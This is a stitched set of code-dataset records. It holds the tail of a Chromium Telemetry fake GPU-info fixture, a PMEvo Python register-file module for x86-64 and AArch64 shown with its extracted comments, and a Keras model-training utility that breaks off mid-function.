'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
} | en | 0.809252 | # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This dictionary of GPU information was captured from a run of # Telemetry on a Linux workstation with NVIDIA GPU. It helps test # telemetry.internal.platform's GPUInfo class, and specifically the # attributes it expects to find in the dictionary; if the code changes # in an incompatible way, tests using this fake GPU info will begin # failing, indicating this fake data must be updated. # # To regenerate it, import pdb in # telemetry/internal/platform/gpu_info.py and add a call to # pdb.set_trace() in GPUInfo.FromDict before the return statement. # Print the attrs dictionary in the debugger and copy/paste the result # on the right-hand side of this assignment. Then run: # # pyformat [this file name] | sed -e "s/'/'/g" # # and put the output into this file. | 1.883435 | 2 |
vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | 6 | 8009 | <filename>vm_setup/pmevo/measurement-server/PITE/register_file.py
#! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
registers = {
"G": # general puprose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
| <filename>vm_setup/pmevo/measurement-server/PITE/register_file.py
#! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
registers = {
"G": # general puprose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
| en | 0.790764 | #! /usr/bin/env python3 # vim: et:ts=4:sw=4:fenc=utf-8 # for each register kind an index pointing to the next register to use # general purpose registers # {"64": "rax", "32": "eax", "repr": "rax"}, # {"64": "rcx", "32": "ecx", "repr": "rcx"}, # {"64": "rdx", "32": "edx", "repr": "rdx"}, # used by gcc # {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc # {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc # used for string instructions # used for string instructions # {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register # {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register # {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame # vector registers # register for non-zero divisor # no need to represent this in the clobber list as it is # hardwired to a this register anyway # base register for memory operands # no need to represent this in the clobber list as it is # hardwired to a this register anyway # general puprose registers # {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame # {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame # {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory # {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor # {"64": "x30", "32": "w30", "repr": "x30"}, # link register # {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register # vector/floating point registers # register for non-zero divisor # no need to represent this in the clobber list as it is # hardwired to a this register anyway # base register for memory operands # no need to represent this in the clobber list as it is # hardwired to a this register anyway | 2.347323 | 2 |
src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 1 | 8010 | <filename>src/training_utils/training.py
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar complicado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
